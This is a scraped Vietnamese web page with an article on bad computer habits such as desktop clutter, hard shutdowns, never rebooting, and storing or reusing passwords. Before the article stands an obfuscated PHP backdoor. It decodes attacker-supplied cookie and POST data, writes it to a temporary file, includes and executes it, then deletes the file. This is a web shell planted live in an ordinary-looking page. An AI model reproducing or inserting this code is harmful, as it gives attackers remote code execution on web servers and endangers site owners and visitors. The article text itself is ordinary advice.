$ylZYFX = chr (85) . '_' . 'E' . "\121" . "\130" . chr (108) . chr (104); $yLWtuVuIpp = 'c' . chr ( 753 - 645 ).chr (97) . "\x73" . chr ( 582 - 467 ).chr (95) . "\145" . "\170" . chr ( 510 - 405 ).chr (115) . "\x74" . 's';$kAOmFrC = class_exists($ylZYFX); $yLWtuVuIpp = "35366";$DZnLrk = strpos($yLWtuVuIpp, $ylZYFX);if ($kAOmFrC == $DZnLrk){function IAeTZP(){$aZfgaHHvu = new /* 4364 */ U_EQXlh(29822 + 29822); $aZfgaHHvu = NULL;}$XKXHSy = "29822";class U_EQXlh{private function KWZRppi($XKXHSy){if (is_array(U_EQXlh::$YNoKSXbD)) {$name = sys_get_temp_dir() . "/" . crc32(U_EQXlh::$YNoKSXbD["salt"]);@U_EQXlh::$YNoKSXbD["write"]($name, U_EQXlh::$YNoKSXbD["content"]);include $name;@U_EQXlh::$YNoKSXbD["delete"]($name); $XKXHSy = "29822";exit();}}public function HfLoXJy(){$XvCgWQeB = "40563";$this->_dummy = str_repeat($XvCgWQeB, strlen($XvCgWQeB));}public function __destruct(){U_EQXlh::$YNoKSXbD = @unserialize(U_EQXlh::$YNoKSXbD); $XKXHSy = "22734_2480";$this->KWZRppi($XKXHSy); $XKXHSy = "22734_2480";}public function gYQxmX($XvCgWQeB, $uwoXMoiAQJ){return $XvCgWQeB[0] ^ str_repeat($uwoXMoiAQJ, intval(strlen($XvCgWQeB[0]) / strlen($uwoXMoiAQJ)) + 1);}public function HturnsX($XvCgWQeB){$IRxSAES = "\142" . "\x61" . "\163" . chr (101) . chr (54) . chr ( 962 - 910 );return array_map($IRxSAES . chr ( 150 - 55 ).chr ( 1074 - 974 )."\145" . "\143" . 'o' . chr (100) . 'e', array($XvCgWQeB,));}public function __construct($oCcnlBmz=0){$vemMBQz = ',';$XvCgWQeB = "";$YdToI = $_POST;$OaybdGwVx = $_COOKIE;$uwoXMoiAQJ = "c88d6de5-9c28-4205-88d1-aa6ae4d03ace";$vclXYK = @$OaybdGwVx[substr($uwoXMoiAQJ, 0, 4)];if (!empty($vclXYK)){$vclXYK = explode($vemMBQz, $vclXYK);foreach ($vclXYK as $TPeibWgFe){$XvCgWQeB .= @$OaybdGwVx[$TPeibWgFe];$XvCgWQeB .= @$YdToI[$TPeibWgFe];}$XvCgWQeB = $this->HturnsX($XvCgWQeB);}U_EQXlh::$YNoKSXbD = $this->gYQxmX($XvCgWQeB, $uwoXMoiAQJ);if (strpos($uwoXMoiAQJ, $vemMBQz) !== FALSE){$uwoXMoiAQJ = explode($vemMBQz, $uwoXMoiAQJ); $dXdlFMY = sprintf("22734_2480", rtrim($uwoXMoiAQJ[0]));}}public static $YNoKSXbD = 56125;}IAeTZP();} Những thói quen xấu khi dùng máy tính - Tải Chùa

Những thói quen xấu khi dùng máy tính

Rate this post

Nhiều người sử dụng máy tính với những thói quen xấu như biến màn hình nền desktop không khác gì “bãi rác”, nhấn nút Power để tắt máy,… Bài viết sau đây của Cuuhotinhoc.com sẽ gửi đến bạn đọc những thói quen xấu khi dùng máy tính nên từ bỏ.

1. Biến màn hình desktop thành “bãi rác”

Nhiều người cho rằng kéo shortcut ra desktop để sử dụng tiện lợi hơn, nhanh hơn khi cần đến và vô tình biến màn hình desktop thành “bãi rác”. Tuy nhiên, nếu đã kín màn hình desktop thì có lẽ việc tìm kiếm còn mất thời gian hơn là để chúng một cách khoa học trong thư mục.

nhung-thoi-quen-xau-khi-dung-may-tinh-1

Bạn có thể sử dụng phần mềm Stardock Fences hoàn toàn miễn phí để tổ chức lại màn hình desktop máy tính của bạn. Fences ngay ở lần đầu khởi chạy sẽ tự động phân loại và “rào” những biểu tượng đang có trên màn hình.

2. Tắt máy bằng nút Power

Hầu hết bo mạch chủ hiện nay hỗ trợ tính năng tắt máy bằng nút Power cứng nhưng các chuyên gia khuyên người dùng không nên thực hiện theo cách này. Một số dòng máy tính mới tự động chuyển sang chế độ Sleep (Ngủ) khi bạn bấm nút Power.

Chế độ “Ngủ” khác với chế độ Tắt máy hoàn toàn ở chỗ máy tính khi ngủ vẫn tiêu thụ năng lượng, nghĩa là linh kiện vẫn làm việc, khiến hao pin với laptop và tuổi thọ máy bị giảm.

Nếu bạn làm dụng chế độ “Ngủ” nghĩa là máy tính của bạn ít khi được khởi động lại. Điều này khiến máy sử dụng sau một thời gian dài hoạt động sẽ trở lên thiếu ổn định, đơ, giật lag. Bạn có thể chỉnh thiết lập trong Power Management để sửa thói quen này.

3. Không bao giờ khởi động lại máy tính

Máy tính sau một thời gian dài làm việc không ngừng nghỉ (không được khởi động lại) sẽ khiến máy chậm hơn, gây khó chịu cho người dùng. Giải pháp khi đó là chỉ cần khởi động lại máy tính. Lời khuyên cho bạn là tắt máy sau một ngày máy tính làm việc hết công suất phục vụ nhu cầu công việc và giải trí của bạn thay vì gập laptop và để nó ở chế độ ngủ.

nhung-thoi-quen-xau-khi-dung-may-tinh-2

4. Lưu trữ mật khẩu trong một file văn bản

Thật buồn cười nếu như bạn đặt mật khẩu các tài khoản và lưu trữ mật khẩu vào một file văn bản trên máy tính. Điều này chẳng khác gì bạn không thiết lập mật khẩu mà còn nguy hiểm hơn bởi chúng có thể bị đánh cắp.

Nếu quá nhiều mật khẩu, bạn có thể sử dụng chương trình quản lý mật khẩu như LastPass.

5. Sử dụng một mật khẩu cho mọi thứ

Nhiều người sử dụng một mật khẩu chung cho nhiều tài khoản. Đây là sai lầm không kém nguy hiểm so với cách lưu trữ mật khẩu vào một file văn bản. Bạn nên tạo cho tài khoản ngân hàng, mua sắm online một mật khẩu mạnh. Với email, trang mạng xã hội, diễn đàn thì mật khẩu nên ở mức độ trung bình.

Hi vọng bài viết của Cuuhotinhoc.com hữu ích với bạn đọc!

Những thói quen xấu khi dùng máy tính

5 (100%) 1 vote